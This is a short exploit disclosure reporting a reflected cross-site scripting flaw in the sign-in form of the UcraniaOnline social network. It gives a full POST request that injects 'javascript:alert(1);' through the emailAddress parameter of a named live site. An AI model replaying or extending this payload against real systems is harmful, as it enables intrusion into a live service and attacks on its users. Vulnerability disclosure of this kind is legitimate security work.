++++++++++++++++++++++++
# Exploit Title : UcraniaOnline Social Network Cross Site Scripting (Reflected)
# *Vendor*: www.ucraniaonline.com
# Author: Juan Carlos Garca (Nightsec)
# Blog: http://hackingmadrid.blogspot.com
# Facebook http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196
BREIF DESCRIPTION
++++++++++++++++++++++++++
UcraniaOnline, is a social network for those who speak Spanish and who will live in Ukraine. This present on Facebook, Twitter and VK.
Cross Site Scripting (Reflected)
++++++++++++++++++++++
Attack:javascript:alert(1);
Proof Of Concept
++++++++++++
Attack:javascript:alert(1);
POST http://ucraniaonline.com/main/authorization/doSignIn?target=http%3A%2F%2Fucraniaonline.com%2Fforum%2Ftopic%2Fnew%3Ftarget%3Dhttp%3A%2F
%2Fucraniaonline.com%2F HTTP/1.1
xg_token=&emailAddress=javascript%3Aalert%281%29%3B&password=ZAP
My best regards to LuLLLLzzzzzsecEs...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++